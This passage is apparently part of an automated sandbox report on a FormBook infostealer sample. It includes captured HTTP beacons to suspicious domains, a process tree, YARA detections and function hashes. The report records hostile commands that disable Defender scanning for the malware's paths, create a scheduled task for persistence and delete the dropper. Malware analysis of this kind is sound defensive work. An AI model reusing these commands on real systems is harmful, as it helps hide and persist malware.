6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta c
Aug 5, 2024 08:52:00.045316935 CEST	1236	IN	Data Raw: 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d Data Ascii: harset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-widt
Aug 5, 2024 08:52:00.045327902 CEST	1236	IN	Data Raw: 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 Data Ascii: e unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
Aug 5, 2024 08:52:00.045865059 CEST	1236	IN	Data Raw: 6e 64 20 74 68 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 20 66 6f 75 6e 64 20 61 74 20 74 68 65 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 Data Ascii: nd the Cloudflare Ray ID found at the bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left
Aug 5, 2024 08:52:00.045876026 CEST	429	IN	Data Raw: 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 Data Ascii: b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49723	3.33.130.190	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:52:20.181860924 CEST	162	OUT	GET /v15n/?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.hatesa.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 08:52:20.643032074 CEST	345	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 05 Aug 2024 06:52:20 GMT Content-Type: text/html Content-Length: 205 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 6e 3d 6c 36 68 38 2b 56 43 44 65 6a 64 38 55 61 43 47 75 42 52 2f 37 54 46 4c 50 47 75 4d 36 5a 6e 55 63 46 4d 36 63 4c 52 69 55 79 54 44 5a 33 4b 53 6e 4c 39 2f 4b 5a 6f 6d 61 6d 65 36 6b 36 72 66 36 54 74 74 26 6d 76 3d 59 34 51 70 70 70 6c 68 53 6a 77 78 57 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yn=l6h8+VCDejd8UaCGuBR/7TFLPGuM6ZnUcFM6cLRiUyTDZ3KSnL9/KZomame6k6rf6Ttt&mv=Y4QppplhSjwxWBd"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.5	49727	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Aug 5, 2024 08:54:03.586595058 CEST	174	OUT	GET /v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd HTTP/1.1 Host: www.dnwgt80508yoec8pzq.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 5, 2024 08:54:04.045094967 CEST	345	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 05 Aug 2024 06:54:03 GMT Content-Type: text/html Content-Length: 205 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 59 6e 3d 70 61 66 4a 68 34 6c 75 74 71 39 73 51 68 59 55 66 6f 6d 5a 67 2b 6d 65 74 73 4a 37 57 69 42 51 78 4d 41 74 78 56 33 65 72 4b 74 50 49 59 7a 53 30 63 39 39 76 45 7a 69 51 2b 50 63 63 32 50 74 4b 72 71 36 26 6d 76 3d 59 34 51 70 70 70 6c 68 53 6a 77 78 57 42 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd"}</script></head></html>

Target ID:	0
Start time:	02:49:58
Start date:	05/08/2024
Path:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Imagebase:	0x6a0000
File size:	668'680 bytes
MD5 hash:	4F9709AA08FB342403B4A9D952419184
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Imagebase:	0x230000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"
Imagebase:	0x230000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp"
Imagebase:	0x920000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:50:00
Start date:	05/08/2024
Path:	C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Imagebase:	0xf30000
File size:	668'680 bytes
MD5 hash:	4F9709AA08FB342403B4A9D952419184
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:50:01
Start date:	05/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000A.00000002.4489782694.0000000010A4E000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	02:50:01
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
Imagebase:	0xe0000
File size:	668'680 bytes
MD5 hash:	4F9709AA08FB342403B4A9D952419184
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:50:02
Start date:	05/08/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	02:50:05
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmstp.exe"
Imagebase:	0x3c0000
File size:	81'920 bytes
MD5 hash:	D7AABFAB5BEFD53BA3A27BD48F3CC675
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:50:06
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp"
Imagebase:	0x920000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:50:06
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:50:06
Start date:	05/08/2024
Path:	C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"
Imagebase:	0xf70000
File size:	668'680 bytes
MD5 hash:	4F9709AA08FB342403B4A9D952419184
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:50:08
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:50:08
Start date:	05/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:50:19
Start date:	05/08/2024
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mstsc.exe"
Imagebase:	0xad0000
File size:	1'264'640 bytes
MD5 hash:	EA4A02BE14C405327EEBA8D9AD2BD42C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2%
Total number of Nodes:	203
Total number of Limit Nodes:	9

Executed Functions

Function 04FE7CE0 Relevance: 3.8, Strings: 1, Instructions: 2567
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pp]q, xrefs: 04FE88B7

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Pp]q
API String ID: 0-2528107101
Opcode ID: a73ba6ed4a3a9b3f4e2f7d2e0813972d37a5b4e306a9d2dec2c9cc9d833fdb37
Instruction ID: 0f43c665e7e57cdb1155f996ca37d68a22a3dfc4906d5be8722d3515cfaa602c
Opcode Fuzzy Hash: a73ba6ed4a3a9b3f4e2f7d2e0813972d37a5b4e306a9d2dec2c9cc9d833fdb37
Instruction Fuzzy Hash: 7D531974A01219CFDB24EF24C884BA9B7B2FF89305F5095E9D509AB361DB30AE85CF45

Function 04FE7CD0 Relevance: 3.8, Strings: 1, Instructions: 2501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pp]q, xrefs: 04FE88B7

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Pp]q
API String ID: 0-2528107101
Opcode ID: 81d160fe2d41be5836f5414311ad603f4722f0ae5d952b14f3b682d3e5fc77ba
Instruction ID: c159c54f45d2caa7354149ed46b6389844b52ef3511e3da37bd60b7a8fb9b7ea
Opcode Fuzzy Hash: 81d160fe2d41be5836f5414311ad603f4722f0ae5d952b14f3b682d3e5fc77ba
Instruction Fuzzy Hash: 40532974A01219CFDB24EF24C884BA9B7B2FF89305F5095E9D509AB361DB30AE85CF45

Function 06F804D8 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

7{f', xrefs: 06F80734

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: 7{f'
API String ID: 0-2192695807
Opcode ID: 9f18cdef455448e298d23581d9876b143941ada80aafdf148be0b7003ba362da
Instruction ID: 8437049090638526f82256fbbc8a465325b0ade4333107348a81a7275cc8241e
Opcode Fuzzy Hash: 9f18cdef455448e298d23581d9876b143941ada80aafdf148be0b7003ba362da
Instruction Fuzzy Hash: 6AA16871E06208DFDB44DFA9EA8599DFBB2EF89300F60A419E006BB254DB349946CF54

Function 06F804C8 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

7{f', xrefs: 06F80734

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: 7{f'
API String ID: 0-2192695807
Opcode ID: 82ba1387218d6266a66a665f2cd4031db3bc2d7af05f47efa9a47e51dec09a72
Instruction ID: 10f9396e191f0b695640dd1de0d61fb5e812ed51b4c2ec229102d22275666263
Opcode Fuzzy Hash: 82ba1387218d6266a66a665f2cd4031db3bc2d7af05f47efa9a47e51dec09a72
Instruction Fuzzy Hash: 16916B71E06209DFDB44CFE9DA8599DFBB2EF89300F60A429E005BB254DB349946CF54

Function 06F801A0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

Z, xrefs: 06F80352

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Z
API String ID: 0-1862792848
Opcode ID: 9357c5383d60ed299255be2b05f7cd6633a554b66b971b0b75ca5ee7add67138
Instruction ID: e3af09bbf21ed4aca88be94cd73dc8d6323fc827ae86c6f8bfe2339d934005eb
Opcode Fuzzy Hash: 9357c5383d60ed299255be2b05f7cd6633a554b66b971b0b75ca5ee7add67138
Instruction Fuzzy Hash: 14913575E01219CFDB44EFA9C8408EEFBB2FB89310F50945AD415B7218DB389A46CFA4

Function 06F80190 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

Z, xrefs: 06F80352

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: Z
API String ID: 0-1862792848
Opcode ID: 04dcc65416d3a81fcfbe9b4302531e31e404199d7d11e9d8402dead1ff3ce7cf
Instruction ID: 9d4535ea13232a111b2770ac773e386144c498bab5fb53ecd548986f7daec0a0
Opcode Fuzzy Hash: 04dcc65416d3a81fcfbe9b4302531e31e404199d7d11e9d8402dead1ff3ce7cf
Instruction Fuzzy Hash: 0C914675E05219CFDB44DFA9C8408EEBBB2FB89310F50846AD411B7358DB389A46CFA4

Function 06F88109 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c8549c6ae199429580446ff6aab56fa389fe92760df7df47a7b22a025729b1
Instruction ID: 1ce7c6b90fedf02dfd4f4acce06c819e59bce944e8a492aa8fd2f9142fd0560b
Opcode Fuzzy Hash: f2c8549c6ae199429580446ff6aab56fa389fe92760df7df47a7b22a025729b1
Instruction Fuzzy Hash: 30215C71E056198FEB68CF67C8046EEFFBBAFC9300F14C0B9D41966254EB340906CA80

Function 06F88193 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea20c887e462981764439dfdb63d690e335fbb49b16a25c774626d7d6d6aeb09
Instruction ID: 789fdef18d7a7c22d6b2a6d5c365d5f0df7f5ce7b926e65c379da9343968684a
Opcode Fuzzy Hash: ea20c887e462981764439dfdb63d690e335fbb49b16a25c774626d7d6d6aeb09
Instruction Fuzzy Hash: DF210B71D156598FEB59CF67C8002AEFFB7BFC9300F14D0BAD419A6255DB740902CA80

Function 06F88118 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cbc65d4fbaa8528b390a199d6b6774b40fb84c3c1ca8144a849dd14c7b4e9dc
Instruction ID: a2d3b50781d0713bc1506d4a7b8172871c7f7eba1d5bf96a2f3e2c93402019dc
Opcode Fuzzy Hash: 4cbc65d4fbaa8528b390a199d6b6774b40fb84c3c1ca8144a849dd14c7b4e9dc
